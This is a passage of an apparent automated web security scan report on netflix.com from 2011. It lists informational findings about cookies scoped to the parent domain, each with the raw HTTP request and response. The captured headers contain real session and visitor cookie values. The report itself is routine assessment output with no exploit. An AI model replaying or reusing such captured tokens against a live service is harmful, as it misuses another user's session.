miscCache=000131kQ7I/YA8wiAIC2m8z/Tu1b/8I=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; __qca=P0-1419279816-1313440086339
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:27:05 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:27:05 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440025205; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440024056~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ Set-Cookie: nflxsid=112.1313440025205; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:05 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440025209~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjUyMDk6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:05 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414825217; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ Vary: Accept-Encoding Content-Length: 18107 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440025205, serverBeforeHtml: 1313440025217 };</script> <meta h...[SNIP]...
3.3. http://www.netflix.com/AllGenresList
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/AllGenresList
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313440012398; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440012239~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ nflxsid=112.1313440012398; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440012402~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMTI0MDI6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:26:52 GMT; Path=/ vstCnt=1~1~1313414812405; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AllGenresList HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; lastHitTime=1313440001609; nflxsid=112.1313440001609; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440001613~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMDE2MTM6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414801616; miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:26:51 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:26:52 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440012398; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440012239~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ Set-Cookie: nflxsid=112.1313440012398; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:26:52 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440012402~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMTI0MDI6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:26:52 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414812405; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:26:52 GMT; Path=/ Vary: Accept-Encoding Content-Length: 79911 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440012398, serverBeforeHtml: 1313440012406 };</script> <meta h...[SNIP]...
3.4. http://www.netflix.com/AllNewReleases
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/AllNewReleases
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313440061108; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:41 GMT; Path=/ nflxsid=112.1313440061108; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AllNewReleases?lnkctr=NavAllNewReleases HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://blog.netflix.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440043253; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nflxsid=112.1313440043253
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 15 Aug 2011 20:27:40 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Location: http://www.netflix.com/entryTrap.jsp?why=hyperactiveSet-Cookie: lastHitTime=1313440061108; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:41 GMT; Path=/ Set-Cookie: nflxsid=112.1313440061108; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Cache-Control: private Content-Length: 0 Content-Type: text/plain
3.5. http://www.netflix.com/AppGallery
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/AppGallery
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313440263028; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ nflxsid=112.1313440263028; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440263035~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAyNjMwMzU6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:03 GMT; Path=/ vstCnt=1~1~1313415063038; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AppGallery HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://developer.netflix.com/member/register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440084868; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nflxsid=112.1313440084869
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 15 Aug 2011 20:31:02 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:31:03 GMT Location: http://www.netflix.com/Default Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440263028; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ Set-Cookie: nflxsid=112.1313440263028; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:03 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440263035~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAyNjMwMzU6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:03 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313415063038; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:03 GMT; Path=/ Vary: Accept-Encoding Content-Length: 0
3.6. http://www.netflix.com/BrowseSelection
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/BrowseSelection
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313439943947; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439943805~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ nflxsid=112.1313439943947; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439943951~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk5NDM5NTI6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:25:43 GMT; Path=/ vstCnt=1~1~1313414743954; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ miscCache=0001IeyYfbanSwHbPg6eSxURzz9dxA4=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=BROWSE_SELECTION&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ miscCache=0001IeyYfbanSwHbPg6eSxURzz9dxA4=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=BROWSE_SELECTION&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BrowseSelection HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; lastHitTime=1313439930896; nflxsid=112.1313439930896; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439930900~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk5MzA5MDA6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414730902; miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:25:43 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:25:43 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313439943947; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439943805~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ Set-Cookie: nflxsid=112.1313439943947; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:25:43 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439943951~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk5NDM5NTI6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:25:43 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414743954; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ Set-Cookie: miscCache=0001IeyYfbanSwHbPg6eSxURzz9dxA4=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=BROWSE_SELECTION&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ Set-Cookie: miscCache=0001IeyYfbanSwHbPg6eSxURzz9dxA4=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=BROWSE_SELECTION&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Content-Length: 68593 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313439943947, serverBeforeHtml: 1313439943957 };</script> <meta h...[SNIP]...
3.7. http://www.netflix.com/ContactUs
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/ContactUs
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313440021492; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440020423~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ nflxsid=112.1313440021492; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440021496~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjE0OTY6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:01 GMT; Path=/ vstCnt=1~1~1313414821498; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ miscCache=000131kQ7I/YA8wiAIC2m8z/Tu1b/8I=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ContactUs HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; lastHitTime=1313440012234; nflxsid=112.1313440012235; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440012239~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMTIyMzk6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414812241; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:27:01 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:27:01 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440021492; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440020423~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ Set-Cookie: nflxsid=112.1313440021492; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:01 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440021496~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjE0OTY6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:01 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414821498; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:01 GMT; Path=/ Set-Cookie: miscCache=000131kQ7I/YA8wiAIC2m8z/Tu1b/8I=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Content-Length: 13271 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440021492, serverBeforeHtml: 1313440021499 };</script> <meta h...[SNIP]...
3.8. http://www.netflix.com/Default
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/Default
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313440085894; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:28:05 GMT; Path=/ nflxsid=112.1313440085894; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Default?lnkctr=entryTrap HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/entryTrap.jsp?why=hyperactive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440065067; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nflxsid=112.1313440065067
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 15 Aug 2011 20:28:05 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Location: http://www.netflix.com/entryTrap.jsp?why=hyperactiveSet-Cookie: lastHitTime=1313440085894; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:28:05 GMT; Path=/ Set-Cookie: nflxsid=112.1313440085894; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Cache-Control: private Content-Length: 0 Content-Type: text/plain
3.9. http://www.netflix.com/Gift
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/Gift
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313440028555; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ nflxsid=112.1313440028556; Domain=.netflix.com; Path=/ miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440028571~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjg1NzE6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 